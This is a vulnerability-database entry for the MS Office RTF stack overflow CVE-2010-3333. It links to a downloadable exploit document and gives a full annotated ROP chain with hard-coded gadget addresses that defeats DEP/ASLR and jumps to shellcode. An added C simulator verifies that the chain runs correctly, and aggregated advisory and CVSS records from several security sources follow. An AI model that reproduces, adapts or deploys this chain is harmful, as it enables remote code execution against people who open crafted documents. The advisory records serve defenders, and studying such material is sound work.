MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit
2011-07-04T00:00:00
ID SSV:20685 Type seebug Reporter Root Modified 2011-07-04T00:00:00
Description
No description provided by source.
# Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit
# Date: 7/3/2011
# Author: Snake ( Shahriyar.j < at > gmail )
# Version: MS Office <= 2010
# Tested on: MS Office 2010 ( 14.0.4734.1000) - Windows 7
# CVE : CVE-2010-3333

# This is the exploit I wrote for the Abysssec "The Arashi" article.
# It gracefully bypasses DEP/ASLR in MS Office 2010,
# and we named this method "Ikazuchi DEP/ASLR Bypass" : >
# Unfortunately msgr3en.dll loads a few seconds after opening Office,
# so you just need to open Office, then open the exploit after a few
# seconds, and you will see a nice calc.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
#              http://www.exploit-db.com/download_pdf/17469
# me : twitter.com/ponez
# Also check here for Persian docs of this method and more :
# http://www.0days.ir/article/

Exploit: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc
#
# And the ROP chain. Every gadget below lives in msgr3en.dll, which is loaded
# at a fixed base (the HeapCreate IAT slot 0x3F10115C sits just above a
# 0x3F100000 image base); that fixed base is what lets hard-coded gadget
# addresses work under ASLR, and why the chain only works once that module
# is loaded.

0x3F2CB9E0  POP ECX
            RETN
            # ECX = 0x3F10115C, the IAT slot that holds the address of HeapCreate()

0x3F389CA5  MOV EAX,DWORD PTR DS:[ECX]
            RETN
            # EAX = address of HeapCreate(), read from the IAT at run time
            # (no kernel32 address is hard-coded, so kernel32 ASLR does not matter)

0x3F39AFCF  CALL EAX
            RETN
            # Calls HeapCreate() with HEAP_CREATE_ENABLE_EXECUTE to create an
            # executable (RWX) heap. The three stdcall arguments follow this
            # gadget on the stack and are popped by HeapCreate on return.
            # After the call EAX holds the heap handle, which is the base
            # address of the new heap region.

0x3F2CB9E0  POP ECX
            RETN
            # ECX = 0x00008000

0x3F39CB46  ADD EAX,ECX
            POP ESI
            RETN
            # EAX = heap base + 0x8000. No HeapAlloc() is needed: as long as the
            # initial commit size passed to HeapCreate covers this offset, the
            # memory there is already RWX and serves as the destination buffer.
            # (POP ESI consumes one junk dword.)

0x3F2CB9E0  POP ECX
            RETN
            # ECX = 0x3F3B3DC0, a writable dword in msgr3en.dll

0x3F2233CC  MOV DWORD PTR DS:[ECX],EAX
            RETN
            # [0x3F3B3DC0] = RWX heap address, saved for later use

0x3F2D59DF  POP EAX
            ADD DWORD PTR DS:[EAX],ESP
            RETN
            # EAX = 0x3F3B3DC4, a writable dword whose initial value is zero.
            # 0 + ESP = ESP, so this stores the current stack pointer at
            # [0x3F3B3DC4]. The shellcode sits on the stack and the stack
            # address is only known at run time; this ADD is how the chain
            # leaks ESP without a MOV reg,ESP gadget. (If the slot were not
            # zero the result would be garbage.)

0x3F2F18CC  POP EAX
            RETN
            # EAX = 0x3F3B3DC4 (the slot holding the saved ESP)

0x3F2B745E  MOV ECX,DWORD PTR DS:[EAX]
            RETN
            # ECX = saved ESP, pointing into the stack near the chain

0x3F39795E  POP EDX
            RETN
            # EDX = 0x00000024

0x3F39CB44  ADD ECX,EDX
            ADD EAX,ECX
            POP ESI
            RETN
            # ECX = saved ESP + 0x24. 0x24 is exactly the number of stack bytes
            # consumed between the ADD [EAX],ESP above and the POP ESI two
            # gadgets below (nine dwords of return addresses and popped values),
            # so ECX now equals the ESP value at that POP ESI. Change any gadget
            # in between and this constant must change with it. (The ADD EAX,ECX
            # result is never used; POP ESI consumes a junk dword.)

0x3F398267  MOV EAX,ECX
            RETN
            # EAX = ECX

0x3F3A16DE  MOV DWORD PTR DS:[ECX],EAX
            XOR EAX,EAX
            POP ESI
            RETN
            # Writes the current ESP value (in EAX) into the stack slot at
            # address ESP, and POP ESI immediately pops that slot: ESI now
            # holds the address of the current stack position, where the rest
            # of the chain and the shellcode are stored.

0x3F398267  MOV EAX,ECX
            RETN
            # EAX = ECX

0x3F2CB9E0  POP ECX
            RETN
            # ECX = 0x3F3B3DC0 (the saved heap address slot)

0x3F389CA5  MOV EAX,DWORD PTR DS:[ECX]
            RETN
            # EAX = RWX heap address

0x3F2B0A7C  XCHG EAX,EDI
            RETN 4
            # EDI = RWX heap address (copy destination). RETN 4 skips one
            # dword that follows the next gadget address on the stack.

0x3F2CB9E0  POP ECX
            RETN
            # ECX = 0x3F3B3DC0 (the saved heap address slot)

0x3F389CA5  MOV EAX,DWORD PTR DS:[ECX]
            RETN
            # EAX = RWX heap address

0x3F38BEFB  ADD AL,0x58
            RETN
            # EAX = heap address + 0x58: skips the tail of the ROP chain that
            # gets copied along with the shellcode, so EAX lands on the
            # shellcode itself. Only AL is modified; that is safe here because
            # the heap base is allocation-granularity aligned and 0x8000 leaves
            # the low byte at 0x00, so there is no carry to lose.

0x3F2CB9E0  POP ECX
            RETN
            # ECX = 0x00000080 (REP count: 0x80 dwords = 0x200 bytes, the copy length)

0x3F3441B4  REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
            POP EDI
            POP ESI
            RETN
            # Copies 0x200 bytes of stack (chain tail + shellcode) from ESI
            # into the RWX heap at EDI. The two POPs consume junk dwords.

0x3F39AFCF  CALL EAX
            RETN
            # Jumps to the shellcode in the RWX heap. KABOOM !!!
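The chain's stack arithmetic is easy to get wrong, so here is an added example, not part of the original exploit or of the Abysssec paper: a small C simulator that lays the chain out on a fake stack, executes it gadget by gadget with the semantics listed above, and checks that the final CALL EAX lands on the copied shellcode. The gadget addresses and the two msgr3en.dll data slots (0x3F3B3DC0/0x3F3B3DC4) are taken from the listing; the stack base, heap base, HeapCreate address, HeapCreate arguments, the 0x14 bytes of padding before the shellcode (needed so that the shellcode starts exactly 0x58 bytes past the copy source, which the listing does not show) and the shellcode bytes are assumptions made for the simulation.

```c
/* rop_sim.c - simulate the HeapCreate/REP MOVSD chain above (added example). */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HEAP_CREATE_ENABLE_EXECUTE 0x00040000u /* real Win32 flag value */
#define IAT_HEAPCREATE  0x3F10115Cu            /* from the listing: IAT slot of HeapCreate */
#define SAVE_SLOT       0x3F3B3DC0u            /* from the listing: two writable, zeroed dwords */
#define FAKE_HEAPCREATE 0x77E01000u            /* assumed stand-in for kernel32!HeapCreate */
#define FAKE_HEAP_BASE  0x00B00000u            /* assumed HeapCreate return value (64K aligned) */
#define STACK_BASE      0x0012F000u            /* assumed stack region */
#define CHAIN_AT        (STACK_BASE + 0x100)   /* assumed: ESP right after the overflowed RET */
#define JUNK            0x41414141u

static uint8_t g_iat[4], g_slot[8], g_stack[0x1000], g_heap[0x10000];
static const uint8_t SHELLCODE[16] = "CALC-SHELLCODE!"; /* constructed marker, not real shellcode */
typedef struct { uint32_t eax, ecx, edx, esi, edi, esp; } regs_t;

/* Resolve a simulated address to a backing buffer; anything else is an access violation. */
static uint8_t *mem(uint32_t a, uint32_t n) {
    if (a >= IAT_HEAPCREATE && a + n <= IAT_HEAPCREATE + sizeof g_iat) return g_iat + (a - IAT_HEAPCREATE);
    if (a >= SAVE_SLOT && a + n <= SAVE_SLOT + sizeof g_slot) return g_slot + (a - SAVE_SLOT);
    if (a >= STACK_BASE && a + n <= STACK_BASE + sizeof g_stack) return g_stack + (a - STACK_BASE);
    if (a >= FAKE_HEAP_BASE && a + n <= FAKE_HEAP_BASE + sizeof g_heap) return g_heap + (a - FAKE_HEAP_BASE);
    fprintf(stderr, "access violation at %08x\n", (unsigned)a); exit(1);
}
static uint32_t rd(uint32_t a) { uint32_t v; memcpy(&v, mem(a, 4), 4); return v; }
static void wr(uint32_t a, uint32_t v) { memcpy(mem(a, 4), &v, 4); }
static uint32_t pop(regs_t *r) { uint32_t v = rd(r->esp); r->esp += 4; return v; }

/* Execute gadgets until CALL EAX targets something other than HeapCreate; return that target. */
static uint32_t run(regs_t *r) {
    uint32_t skip = 0;                                   /* pending "RETN n" stack adjustment */
    for (;;) {
        uint32_t g = pop(r); r->esp += skip; skip = 0;   /* RETN: fetch the next gadget address */
        switch (g) {
        case 0x3F2CB9E0: r->ecx = pop(r); break;                                     /* POP ECX ; RETN */
        case 0x3F2F18CC: r->eax = pop(r); break;                                     /* POP EAX ; RETN */
        case 0x3F39795E: r->edx = pop(r); break;                                     /* POP EDX ; RETN */
        case 0x3F389CA5: r->eax = rd(r->ecx); break;                                 /* MOV EAX,[ECX] ; RETN */
        case 0x3F2B745E: r->ecx = rd(r->eax); break;                                 /* MOV ECX,[EAX] ; RETN */
        case 0x3F398267: r->eax = r->ecx; break;                                     /* MOV EAX,ECX ; RETN */
        case 0x3F2233CC: wr(r->ecx, r->eax); break;                                  /* MOV [ECX],EAX ; RETN */
        case 0x3F39CB46: r->eax += r->ecx; r->esi = pop(r); break;                   /* ADD EAX,ECX ; POP ESI ; RETN */
        case 0x3F39CB44: r->ecx += r->edx; r->eax += r->ecx; r->esi = pop(r); break; /* ADD ECX,EDX ; ADD EAX,ECX ; POP ESI ; RETN */
        case 0x3F2D59DF: r->eax = pop(r); wr(r->eax, rd(r->eax) + r->esp); break;    /* POP EAX ; ADD [EAX],ESP ; RETN */
        case 0x3F3A16DE: wr(r->ecx, r->eax); r->eax = 0; r->esi = pop(r); break;     /* MOV [ECX],EAX ; XOR EAX,EAX ; POP ESI ; RETN */
        case 0x3F2B0A7C: { uint32_t t = r->eax; r->eax = r->edi; r->edi = t; skip = 4; break; } /* XCHG EAX,EDI ; RETN 4 */
        case 0x3F38BEFB: r->eax = (r->eax & 0xFFFFFF00u) | ((r->eax + 0x58) & 0xFFu); break; /* ADD AL,0x58 ; RETN (carry out of AL is lost) */
        case 0x3F3441B4:                                                             /* REP MOVSD ; POP EDI ; POP ESI ; RETN */
            for (; r->ecx; r->ecx--, r->esi += 4, r->edi += 4) wr(r->edi, rd(r->esi));
            r->edi = pop(r); r->esi = pop(r); break;
        case 0x3F39AFCF:                                                             /* CALL EAX ; RETN */
            if (r->eax != FAKE_HEAPCREATE) return r->eax;                            /* final jump into the heap */
            if (!(rd(r->esp) & HEAP_CREATE_ENABLE_EXECUTE)) { fputs("heap would not be executable\n", stderr); exit(1); }
            wr(r->esp - 4, g + 2);                        /* CALL pushes the return address (the RETN after CALL EAX) */
            r->esp += 12; r->eax = FAKE_HEAP_BASE; break; /* stdcall callee pops flags, initial size, maximum size */
        default: fprintf(stderr, "unknown gadget %08x\n", (unsigned)g); exit(1);
        }
    }
}

/* Lay the chain out on the simulated stack in the order listed above. */
static uint32_t build_chain(void) {
    static const uint32_t chain[] = {
        0x3F2CB9E0, IAT_HEAPCREATE, 0x3F389CA5,                 /* ECX = IAT slot ; EAX = HeapCreate */
        0x3F39AFCF, HEAP_CREATE_ENABLE_EXECUTE, 0x10000, 0,     /* HeapCreate(flags, initial, max): args assumed */
        0x3F2CB9E0, 0x8000, 0x3F39CB46, JUNK,                   /* EAX = heap + 0x8000 */
        0x3F2CB9E0, SAVE_SLOT, 0x3F2233CC,                      /* [SAVE_SLOT] = heap + 0x8000 */
        0x3F2D59DF, SAVE_SLOT + 4,                              /* [SAVE_SLOT+4] += ESP (slot starts at zero) */
        0x3F2F18CC, SAVE_SLOT + 4, 0x3F2B745E,                  /* ECX = saved ESP */
        0x3F39795E, 0x24, 0x3F39CB44, JUNK,                     /* ECX = saved ESP + 0x24 */
        0x3F398267, 0x3F3A16DE, 0xDEADBEEF,                     /* [ECX] = ECX ; POP ESI (this slot is overwritten at run time) */
        0x3F398267, 0x3F2CB9E0, SAVE_SLOT, 0x3F389CA5,          /* EAX = heap + 0x8000 */
        0x3F2B0A7C, 0x3F2CB9E0, JUNK, SAVE_SLOT, 0x3F389CA5,    /* EDI = heap + 0x8000 (RETN 4 skips the JUNK) ; EAX = heap + 0x8000 */
        0x3F38BEFB, 0x3F2CB9E0, 0x80,                           /* AL += 0x58 ; ECX = 0x80 dwords */
        0x3F3441B4, JUNK, JUNK, 0x3F39AFCF,                     /* REP MOVSD ; CALL EAX */
        JUNK, JUNK, JUNK, JUNK, JUNK,                           /* assumed padding so the shellcode starts 0x58 past the copy source */
    };
    size_t n = sizeof chain / sizeof chain[0];
    for (size_t i = 0; i < n; i++) wr(CHAIN_AT + 4 * (uint32_t)i, chain[i]);
    memcpy(mem(CHAIN_AT + 4 * (uint32_t)n, sizeof SHELLCODE), SHELLCODE, sizeof SHELLCODE);
    return CHAIN_AT;
}

/* Run the whole chain from a clean state; returns the address the final CALL EAX jumps to. */
static uint32_t simulate(void) {
    memset(g_slot, 0, sizeof g_slot); memset(g_heap, 0, sizeof g_heap); memset(g_stack, 0, sizeof g_stack);
    wr(IAT_HEAPCREATE, FAKE_HEAPCREATE);
    regs_t r = { 0, 0, 0, 0, 0, build_chain() };
    return run(&r);
}
/* True if the bytes at target are the shellcode marker. */
static int landed_on_shellcode(uint32_t target) {
    return memcmp(mem(target, sizeof SHELLCODE), SHELLCODE, sizeof SHELLCODE) == 0;
}
int main(void) {
    uint32_t t = simulate();
    printf("final CALL EAX -> %08x (%s)\n", (unsigned)t, landed_on_shellcode(t) ? "shellcode" : "miss");
    return 0;
}
```

Build with `cc rop_sim.c -o rop_sim`. The simulator is deliberately strict about the two things that silently break this chain in practice: the 0x3F3B3DC4 slot must be zero when ADD [EAX],ESP runs (the simulator clears it before each run), and the 0x24 constant must match the number of dwords between that gadget and the POP ESI that consumes the written slot; remove or add a gadget in that window and the copy source no longer points at the shellcode.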
Source record: seebug SSV:20685 (https://www.seebug.org/vuldb/ssvid-20685)
Status: poc   Family: exploit   Reporter: Root
Published / modified: 2011-07-04   Last seen: 2017-11-19
CVSS v2: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)   Vulners score: 8.0
CVE list as recorded: CVE-2010-3333, CVE-2011-3333 (the exploit header itself names only CVE-2010-3333)

Cross-references recorded for this entry:
  CVE: CVE-2010-3333
  AttackerKB: AKB:EF06DFEA-51B0-4EEF-853F-DF7BB23652F6
  Exploit-DB: EDB-ID:18334, EDB-ID:17474, EDB-ID:24526, EDB-ID:16686
  Exploit Pack: EXPLOITPACK:095716821BD1E68073429FABC0094CEF
  SAINT: SAINT:87747EDA7232EAC177AAACAB996B902A, SAINT:0D5E6B5FD2A6D55DB607E0CAA6894200, SAINT:1C3A20B778001D2044C60E107B2E9BB4
  SecurityVulns: SECURITYVULNS:DOC:25106, SECURITYVULNS:DOC:25114, SECURITYVULNS:VULN:11248
  Threatpost: THREATPOST:4474B9334E9322D775C57232CC4127EF, THREATPOST:C0872257AF615C3542B0C9F0BAE4A57D, THREATPOST:67D34DEB790B708B10391D13A8BE6EAB, THREATPOST:551363592C0C853E266999644B3579E4, THREATPOST:4A77E471AA7DA847C227B575A8681E66, THREATPOST:23B92BF326746339F6B36D64AEB2D5F6, THREATPOST:5DA1737F4321D42086053820C84CCFB0, THREATPOST:3C3169D334DC65F9EAF925A5796C7ECF
  Packet Storm: PACKETSTORM:97153
  seebug: SSV:20246
  Metasploit: MSF:EXPLOIT/WINDOWS/FILEFORMAT/MS10_087_RTF_PFRAGMENTS_BOF
  0day.today: 1337DAY-ID-21830
  The Hacker News: THN:B02C7C78600ED331232ABD4D1F8D2C4A, THN:3BF9400C51248462741DFA3EAF706DEE
  Nessus: MACOSX_MS_OFFICE_NOV2010.NASL, SMB_NT_MS10-087.NASL
  FireEye: FIREEYE:E267B700204EA085E6CF4FEBA0C989D3, FIREEYE:38120E3D3979DCD57297419690545DDD
  OpenVAS: OPENVAS:1361412562310901166, OPENVAS:901166
  Microsoft KB: KB2423930
  Other: KITPLOIT:4573857264821982104, N0WHERE:172361, MYHACK58:62201994516
{"attackerkb": [{"lastseen": "2020-11-18T06:43:55", "bulletinFamily": "info", "cvelist": ["CVE-2010-3333"], "description": "Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka \u201cRTF Stack Buffer Overflow Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**dmelcher5151** at April 15, 2020 4:16pm UTC reported:\n\nWas the bread and butter for many phishing campaigns for years.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "modified": "2020-07-30T00:00:00", "published": "2010-11-10T00:00:00", "id": "AKB:EF06DFEA-51B0-4EEF-853F-DF7BB23652F6", "href": "https://attackerkb.com/topics/0WUhS2vPZJ/cve-2010-3333", "type": "attackerkb", "title": "CVE-2010-3333", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-10-03T11:57:28", "description": "Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka \"RTF Stack Buffer Overflow Vulnerability.\"", "edition": 3, "cvss3": {}, "published": "2010-11-10T03:00:00", "title": "CVE-2010-3333", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2010-3333"], "modified": "2018-10-12T21:58:00", "cpe": ["cpe:/a:microsoft:office:2008", "cpe:/a:microsoft:office:2003", "cpe:/a:microsoft:office:2007", "cpe:/a:microsoft:open_xml_file_format_converter:*", "cpe:/a:microsoft:office:2010", "cpe:/a:microsoft:office:2011", "cpe:/a:microsoft:office:2004", "cpe:/a:microsoft:office:xp"], "id": "CVE-2010-3333", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:open_xml_file_format_converter:*:*:mac:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2003:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2004:*:mac:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2011:*:mac:*:*:*:*:*", "cpe:2.3:a:microsoft:office:xp:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2010:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2008:*:mac:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2007:sp2:*:*:*:*:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Office 2010 - .RTF Header Stack Overflow", "edition": 1, "published": "2011-07-03T00:00:00", "title": "Microsoft Office 2010 - .RTF Header Stack Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333", "CVE-2011-3333"], "modified": "2011-07-03T00:00:00", "id": "EXPLOITPACK:095716821BD1E68073429FABC0094CEF", "href": "", "sourceData": "# Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability\nExploit\n# Date: 7/3/2011\n# Author: Snake ( Shahriyar.j < at > gmail )\n# Version: MS Office <= 2010\n# Tested on: MS Office 2010 ( 14.0.4734.1000) - Windows 7\n# CVE : CVE-2010-3333\n\n# This is the exploit I wrote for Abysssec \"The Arashi\" article.\n# It gracefully bypass DEP/ASLR in MS Office 2010,\n# and we named this method \"Ikazuchi DEP/ASRL Bypass\" : >\n# unfortunately msgr3en.dll loads a few seconds after opining office,\n# so just need to open open Office , and then open exploit after a few second and saw a nice 
calc.\n#\n# The Arashi : http://abysssec.com/files/The_Arashi.pdf\n# http://www.exploit-db.com/docs/17469.pdf\n#\n# me : twitter.com/ponez\n# aslo check here for Persian docs of this methods and more :\n# http://www.0days.ir/article/\n\n\n\n#\n# and the Rop :\n\n3F2CB9E0 POP ECX\n RETN\n # HeapCreate() IAT = 3F10115C\n\n3F389CA5 MOV EAX,DWORD PTR DS:[ECX]\n RETN\n # EAX == HeapCreate() Address\n\n3F39AFCF CALL EAX\n RETN\n # Call HeapCreate() and Create a Executable Heap :D\n # after this call, EAX contain our Heap Address.\n\n0x3F2CB9E0 POP ECX\n RETN\n # pop 0x00008000 into ECX\n\n0x3F39CB46 ADD EAX,ECX\n POP ESI\n RETN\n # add ECX to EAX and instead of calling HeapAlloc,\n # now EAX point to the RWX Heap :D\n\n0x3F2CB9E0 POP ECX\n RETN\n # pop 0x3F3B3DC0 into ECX, it is a writable address.\n\n0x3F2233CC MOV DWORD PTR DS:[ECX],EAX\n RETN\n # storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for\nfurther use ;)\n\n0x3F2D59DF POP EAX\n ADD DWORD PTR DS:[EAX],ESP\n RETN\n # pop 0x3F3B3DC4 into EAX , it is writable address with zero!\n # then we add ESP to the Zero which result in storing ESP into\nthat address,\n # we need ESP address for copying shellcode ( which stores in\nStack ),\n # and we have to get it dynamically at run-time, now with my\ntricky instruction, we have it!\n\n\n0x3F2F18CC POP EAX\n RETN\n # pop 0x3F3B3DC4 ( ESP address ) into EAX\n\n\n0x3F2B745E MOV ECX,DWORD PTR DS:[EAX]\n RETN\n # now ECX point to nearly offset of Stack.\n\n0x3F39795E POP EDX\n RETN\n # pop 0x00000024 into EDX\n\n0x3F39CB44 ADD ECX,EDX\n ADD EAX,ECX\n POP ESI\n RETN\n # add 0x24 to ECX ( Stack address )\n\n0x3F398267 MOV EAX,ECX\n RETN\n # EAX = ECX ; )\n\n0x3F3A16DE MOV DWORD PTR DS:[ECX],EAX\n XOR EAX,EAX\n POP ESI\n RETN\n # mov EAX ( Stack Address + 24 = Current ESP value ) into the\ncurrent Stack Location,\n # and the popping it into ESI ! 
now ESI point where shellcode\nstores in stack :D\n\n0x3F398267 MOV EAX,ECX\n RETN\n # EAX = ECX ; )\n\n3F2CB9E0 POP ECX\n RETN\n # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\n\n0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]\n RETN\n # now EAX point to our RWX Heap\n\n0x3F2B0A7C XCHG EAX,EDI\n RETN 4\n # EDI = Our RWX Heap Address\n\n\n3F2CB9E0 POP ECX\n RETN\n # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX\n \n\n0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]\n RETN\n # now EAX point to our RWX Heap\n\n0x3F38BEFB ADD AL,58\n RETN\n # just skip some junks ; )\n\n3F2CB9E0 POP ECX\n RETN\n # pop 0x00000080 into ECX ( 0x80 * 4 = 0x200 = Copy lent )\n\n3F3441B4 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]\n POP EDI\n POP ESI\n RETN\n # Copy shellcode from stack into RWX Heap\n\n\n3F39AFCF CALL EAX\n RETN\n # KABOOM !!!\n\n\n\n\n\nExploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17474.doc (cve-2011-3333_exploit.doc)", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "description": "Added: 11/16/2010 \nCVE: [CVE-2010-3333](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3333>) \nBID: [44652](<http://www.securityfocus.com/bid/44652>) \nOSVDB: [69085](<http://www.osvdb.org/69085>) \n\n\n### Background\n\n[Microsoft Office](<http://office.microsoft.com>) is a package which provides word processing, spreadsheet, presentation, e-mail, and calendaring capabilities for Microsoft Windows workstations. \n\n### Problem\n\nA stack buffer overflow vulnerability exists when Microsoft Word parses RTF documents. The vulnerability is due to lack of input validation when handling the values set for the `**pFragments**` property. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 10-087](<http://www.microsoft.com/technet/security/bulletin/MS10-087.mspx>). 
\n\n### References\n\n<http://secunia.com/advisories/38521/> \n\n\n### Limitations\n\nExploit works on Microsoft Office Word 2002 SP3, Word 2003 SP3, and Word 2007 SP2. \n\nThe user must open the exploit file in Microsoft Word on the target system. \n\n### Platforms\n\nWindows XP \nWindows Vista \n \n\n", "edition": 1, "modified": "2010-11-16T00:00:00", "published": "2010-11-16T00:00:00", "id": "SAINT:87747EDA7232EAC177AAACAB996B902A", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ms_office_rtf_pfragments_property", "type": "saint", "title": "Microsoft Office RTF pFragments Property Stack Buffer Overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "edition": 2, "description": "Added: 11/16/2010 \nCVE: [CVE-2010-3333](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3333>) \nBID: [44652](<http://www.securityfocus.com/bid/44652>) \nOSVDB: [69085](<http://www.osvdb.org/69085>) \n\n\n### Background\n\n[Microsoft Office](<http://office.microsoft.com>) is a package which provides word processing, spreadsheet, presentation, e-mail, and calendaring capabilities for Microsoft Windows workstations. \n\n### Problem\n\nA stack buffer overflow vulnerability exists when Microsoft Word parses RTF documents. The vulnerability is due to lack of input validation when handling the values set for the `**pFragments**` property. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 10-087](<http://www.microsoft.com/technet/security/bulletin/MS10-087.mspx>). \n\n### References\n\n<http://secunia.com/advisories/38521/> \n\n\n### Limitations\n\nExploit works on Microsoft Office Word 2002 SP3, Word 2003 SP3, and Word 2007 SP2. \n\nThe user must open the exploit file in Microsoft Word on the target system. 
\n\n### Platforms\n\nWindows XP \nWindows Vista \n \n\n", "modified": "2010-11-16T00:00:00", "published": "2010-11-16T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ms_office_rtf_pfragments_property", "id": "SAINT:0D5E6B5FD2A6D55DB607E0CAA6894200", "type": "saint", "title": "Microsoft Office RTF pFragments Property Stack Buffer Overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:34", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "description": "Added: 11/16/2010 \nCVE: [CVE-2010-3333](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3333>) \nBID: [44652](<http://www.securityfocus.com/bid/44652>) \nOSVDB: [69085](<http://www.osvdb.org/69085>) \n\n\n### Background\n\n[Microsoft Office](<http://office.microsoft.com>) is a package which provides word processing, spreadsheet, presentation, e-mail, and calendaring capabilities for Microsoft Windows workstations. \n\n### Problem\n\nA stack buffer overflow vulnerability exists when Microsoft Word parses RTF documents. The vulnerability is due to lack of input validation when handling the values set for the `**pFragments**` property. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 10-087](<http://www.microsoft.com/technet/security/bulletin/MS10-087.mspx>). \n\n### References\n\n<http://secunia.com/advisories/38521/> \n\n\n### Limitations\n\nExploit works on Microsoft Office Word 2002 SP3, Word 2003 SP3, and Word 2007 SP2. \n\nThe user must open the exploit file in Microsoft Word on the target system. 
\n\n### Platforms\n\nWindows XP \nWindows Vista \n \n\n", "edition": 4, "modified": "2010-11-16T00:00:00", "published": "2010-11-16T00:00:00", "id": "SAINT:1C3A20B778001D2044C60E107B2E9BB4", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ms_office_rtf_pfragments_property", "title": "Microsoft Office RTF pFragments Property Stack Buffer Overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-3333"], "description": "iDefense Security Advisory 11.09.10\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nNov 09, 2010\r\n\r\nI. BACKGROUND\r\n\r\nMicrosoft Word is a word processing application from Microsoft Office.\r\nFor more information about Microsoft Word, see the following website:\r\nhttp://office.microsoft.com/en-us/word/default.aspx\r\n\r\nRich-Text Format (RTF) is a document file format developed by Microsoft\r\nfor cross-platform document interchange.\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a stack buffer overflow vulnerability in\r\nMicrosoft Corp.'s Word could allow attackers to execute arbitrary code\r\nunder the privileges of the targeted user.\r\n\r\nThis vulnerability specifically exists in the handling of a specific\r\ncontrol word in an RTF document. Under certain circumstances, Word will\r\ncopy its property strings into a stack buffer without checking the\r\nlength, which causes a stack buffer overflow.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation allows remote attackers to execute arbitrary code on the\r\naffected host under the context of the user who opened the malicious\r\nRTF document with Microsoft Word.\r\n\r\nExploitation might require that the user open a specially crafted RTF\r\ndocument with a vulnerable application. 
